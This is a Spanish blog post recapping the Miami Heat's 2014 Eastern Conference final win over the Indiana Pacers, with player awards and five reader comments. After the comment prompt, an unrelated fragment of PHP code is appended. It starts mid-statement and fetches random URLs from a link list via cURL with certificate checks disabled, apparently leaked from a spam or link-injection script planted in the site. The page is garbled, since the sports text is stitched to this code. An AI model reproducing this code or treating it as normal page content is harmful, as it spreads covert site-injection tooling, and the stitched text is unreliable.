La Crónica: Un equipo histórico

31 de May de 2014 por txusma

Cuando hace casi 4 años Lebron James anunciaba al mundo que se uniría a Dwyane Wade y Chris Bosh en los Miami Heat, muchos desearon que jamás consiguiera su objetivo. Cuando los Mavs le arrebataron con todo el merecimiento el anillo de la temporada 2010-2011 muchos lo celebraron con cava. Sin embargo, todos y cada uno de los críticos tendrán que rendirse a la evidencia deque estamos ante uno de esos equipos que sobreviven para siempre en los libros de historia. Con la victoria de ayer los Heat de Lebron se convierten en el 4º equipo de la historia en disputar 4 o más finales consecutivas. ¿Sus compañeros? Los Celtics de Russell, los Lakers de Magic y los Celtics de Bird. Impresionante compañía.

Los Pacers abrieron el partido con un parcial de 9-2 pero a partir de ahí fueron incapaces de frenar el vendaval que se les vino encima. Miami llegó al descanso con 26 puntos de diferencia que aumentó hasta los 37 hacia la mitad del 3er cuarto cuando la fiesta en el American Arlines Arena era ya completa. Por el camino Lance Stephenson había continuado con el show que ha ido presentando durante toda la serie y que le ha descentrado a él y a todos sus compañeros. Lebron se llevó un par de toques en la cara y Norris Cole recibió otro algo más contundente.

Al final la diferencia se quedó en 25 puntos pero la mayor humillación para Indiana fue la de tener que enfrentarse en los últimos minutos de un partido decisivo a un quinteto formado por Douglas, Battier, Jones, Haslem y Greg Oden, que disputaba sus primeros minutos en estos playoffs. Suyo fue el honor de izar el trofeo de campeón de conferencia en primer término, un premio para un jugador que ha sufrido mucho durante estos últimos años. 

PREMIOS

MVP: Tras el soplido de Stephenson y la mala actuación en el anterior partido muchos augurábamos un partidazo de Lebron James y no nos equivocamos. 25 puntos, 6 asistencias y 4 rebotes en 32 minutos.

Sorpresa: Rashard Lewis (13p) ha acabado siendo clave en esta serie. En los primeros partidos destacamos su defensa sobre David West y en estos últimos su acierto desde la línea de 3.

Decepción: Si le preguntan a la estrella de tu equipo si quiere jugar contigo el año próximo y su respuesta es “Pues no lo sé”, es que algo muy mal estás haciendo. Lance Stephenson ha demostrado que cabeza y talento muchas veces van por caminos diferentes.

Esfuerzo en vano: No se merecía Paul George los gritos de ‘over-rated’ que se escucharon en algunos momentos del partido. Con 29 puntos fue el mejor de los suyos en un partido muy complicado de jugar hasta el último minuto.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    al menos los Pacers ganaron 2 juegos, y maquillan un poco una serie que en los hechos fue barrida (a excepcion del juego 1, el Heat apenas ha tenido que transpirar)

      Citar

  2. rumbero dice:
    #2

    Esteban:
    al menos los Pacers ganaron 2 juegos, y maquillan un poco una serie que en los hechos fue barrida (a excepcion del juego 1, el Heat apenas ha tenido que transpirar)

    Pues sí. Quitando el primero donde lo metieron todo y el quinto en el que apareció George, no ha dado la impresión que los Pacers pudieran ganar esto. Se va a hablar mucho de Stephenson, pero hay otros jugadores como Hill y Hibbert que han sido una auténtica decepción.
    En Miami como siempre han empezado a aparecer jugadores conforme avanzan los PO (tela con Lewis) y han impuesto ese nivel defensivo que marca la diferencia. Llegan muy bien a la final

      Citar

  3. Ruxixon dice:
    #3

    Let’s go Heat!!!

    Lo de Stephenson yo se lo compro,y eso que es el tipo de jugador al que odias cuando le tienes como rival.Eso si,no parece que los Pacers estén “cómodos” con él y veremos hasta que punto tensan la relación representante del jugador y Bird.Me huele a que le darán lo que pide y luego lo traspasarán -se puede hacer esto con un No restringido?¿- por un base que sepa drigir el cotarro,que se ha visto de todo menos un equipo en ataque y ni estaría de más poner a un PG de nivel al equipo.Vogel muy señalado desde las declaraciones de Bird en la primera ronda,y no me extrañaría que apretaran el gatillo.

      Citar

  4. Denise dice:
    #4

    No he podido ver ningún partido, pero guiandome por los resumenes, fracaso total de temporada de los Pacers, quienes tras un brillante inicio y tras conseguir a Turner practicamente gratis en febrero, se posicionaban no con solo el mejor equipo del Este, sino quizas de toda la NBA. Y qué pasó?
    Pues supongo que los menage a trois desencadenando una versión pobre de Hibbert y a veces de George, ó la mala influencia de Bynum, ó lo que sea, para mí los Pacers han tirado a la basura la temporada y yo la tildo de fracaso.
    Si solo te guias porque ganaron casi 60 partidos en Regular Season y llegaron a finales de conferencia, parecerá un buen año, pero joder…con semejante equipo no puedes casi eliminarte ante los Hawks y los Wizards, y que luego los Heat te dominen de esa manera.

      Citar

  5. Mamba_Blanca dice:
    #5

    Hablando de equipos históricos, señoras y señores, ponganse en pie para recibir a los San Antonio Spurs.

    Se acaban ya los calificativos para definirles, y definitivamente, se merecen otro anillo más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>